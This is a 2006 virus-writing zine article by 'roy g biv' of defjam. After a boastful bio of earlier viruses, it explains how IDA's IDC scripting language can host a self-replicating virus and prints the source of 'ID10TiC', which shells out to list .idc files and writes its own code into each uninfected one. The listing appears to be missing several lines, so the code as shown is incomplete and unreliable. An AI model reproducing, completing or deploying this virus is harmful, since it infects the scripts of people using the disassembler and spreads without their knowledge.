The IDA Scripting Language
by roy g biv
                          The IDA Scripting Language
                              roy g biv / defjam

                                 -= defjam =-
                                  since 1992
                     bringing you the viruses of tomorrow

Former  DOS/Win16  virus writer, author of several virus  families,  including
Ginger  (see Coderz #1 zine for terrible buggy example, contact me for  better
sources  ;),  and Virus Bulletin 9/95 for a description of what   they  called
Rainbow.   Co-author  of  world's first virus using circular  partition  trick
(Orsam, coded with Prototype in 1993).  Designer of world's first XMS swapping
virus  (John Galt, coded by RT Fishel in 1995, only 30 bytes stub, the rest is
swapped  out).   Author of world's first virus using Thread Local Storage  for
replication  (Shrug, see Virus Bulletin 6/02 for a description, but they  call
it Chiton), world's first virus using Visual Basic 5/6 language extensions for
replication  (OU812), world's first Native executable virus (Chthon),  world's
first  virus  using process co-operation to prevent termination  (Gemini,  see
Virus  Bulletin 9/02 for a description), world's first virus using polymorphic
SMTP  headers (JunkMail, see Virus Bulletin 11/02 for a description),  world's
first viruses that can convert any data files to infectable objects (Pretext),
world's  first  32/64-bit  parasitic  EPO .NET  virus  (Croissant,  see  Virus
Bulletin  11/04  for a description, but they call it Impanate), world's  first
virus  using  self-executing HTML (JunkHTMaiL, see Virus Bulletin 7/03  for  a
description), world's first virus for Win64 on Intel Itanium (Shrug, see Virus
Bulletin 6/04 for a description, but they call it Rugrat), world's first virus
for  Win64 on AMD AMD64 (Shrug), world's first cross-infecting virus for Intel
IA32  and  AMD  AMD64  (Shrug),  world's  first  viruses  that  infect  Office
applications  and  script  files  using the same  code  (Macaroni,  see  Virus
Bulletin  11/05  for  a description, but they call it Macar),  world's   first
viruses  that  can infect both VBS and JScript using the same code (ACDC,  see
Virus  Bulletin 11/05 for a description, but they call it Cada), world's first
IDA  plugin virus (Hidan), world's first viruses that use the Microsoft Script
Encoder  to  dynamically  encrypt the virus body (Screed), and  world's  first
virus for StarOffice and OpenOffice (Starbucks).  Author of various retrovirus
articles  (eg  see Vlad #7 for the strings that  make  your code invisible  to
TBScan).   This is my first virus for IDC.  It is the world's first IDC virus.

What is it?

Many  people know about the Interactive Disassembler.  It is a great tool  for
disassembling  many  different file formats for many different CPUs.  It  even
has  a  debugger now, so it can be used for all kinds of  reverse-engineering,
unpacking,  decrypting,  etc.  In case that was not enough  functionality,  it
also supports a language called IDC.  In the words of Ilfak, IDC language is a
C-like  language.   It has the same lexical tokens as C does:  character  set,
constants,  identifiers, keywords, etc.  A program in IDC consists of function

IDC language

For  some  years, I wondered if an IDA virus could be possible.  When I  first
tried  in the IDC language, I wanted to infect Windows files.  There were some
problems,  though.   The  first  problem is that IDA opens a  file  with  full
sharing,  but  the  IDC  language does not support doing that, so  it  is  not
possible  to infect the file that is being examined.  That leaves as an option
to find other files to infect, but there is no enumeration function in the IDC
language.  I thought that meant that we can infect only the files that we know
to  exist,  and that wasn't interesting to me.  However, I just needed to  ask
the  command interpreter to find the files for me.  The remaining problem,  of
course,  is that there is no access to the Windows APIs, so there is no way to
check  for protected file.  To avoid that, I just decided to infect other  IDC
files instead.

IDC programs

Most  IDC programs are designed to execute immediately.  To do that, they must
contain  a function called "main".  This function is executed whenever the IDC
file is loaded.

The  exception  to  that  rule is the special file  called  "onload.idc".   It
functions like the global template in Microsoft Office.  The "OnLoad" function
is  called automatically by IDA when a new file is loaded for analysis.  There
is  another file of similar type, called "userload.idc".  It is loaded by  the
onload.idc,  and the "userload" function is called automatically in that case.
By  placing code into either of these two functions, we can be called whenever
IDA starts.

IDC variables

The  IDC language supports variables of automatic type (similar to Variants in
OLE2).   That  means  we can assign any letters or numbers or strings  to  any
variable  in  one line, and in the next line we can assign anything else.   No
need to declare the variable to be of a particular type.

Variables have a scope (a variable declared inside {} are not visible outside)
but there are no global variables.

Just like in C, variable declaration must be the first thing in a function.

The code

To  make a replicating text code, we can either carry our own source, or  read
it  from an already infected file.  If our source contains special  characters
(like  '"' and '\' in IDC), they must be escaped in order to place them into a
string  variable.   The problem is that after the assignment, they need to  be
escaped again when writing to another file.  This is the puzzle - how to carry
both  transportable  and executable source?  Instead of solving that,  I  just
find an infected file and read the source from there. :)

Here is the code, must be a single line:

  /*ID10TiC - roy g biv 06/07/06*/
    auto a,b,c,d,e,f,g,h,i,j;
    Exec("%comspec% /c dir /b "+(a=GetIdaDirectory()+"\\idc\\")+"*.idc>r");
                                                //make list of IDC files
    while(d>=0)                                 //becomes -1 when all list read
      while(!c&&(d=readstr(b))>0)               //get filename
                                                //open potential victim
        while((d=readstr(e))>0)                 //read each line
          if(strstr(d,"auto")>0)                //look for "auto" line
            if((f=strstr(d,"/*ID"))>0)          //check for infection marker
              if(!g)                            //if not read source yet
                c=1;                            //set restart flag
                g=1;                            //remember read source
                                                //get our source
              break;                            //restart
            if(g)                               //if read source
                                                //seek after ';'
              while((j=readstr(e))>0)           //read rest of file
              fseek(e,i,0);                     //seek after ';'
              writestr(e,h+f);                  //write our source then rest of file
    /**/                                        //end of code marker with next '}'

Greets to friendly people (A-Z):

Active - Benny - Obleak - Prototype - Ratter - Ronin - RT Fishel -
sars - SPTH - The Gingerbread Man - Ultras - uNdErX - Vallez - Vecna -
VirusBuster - Whitehead

rgb/defjam jul 2006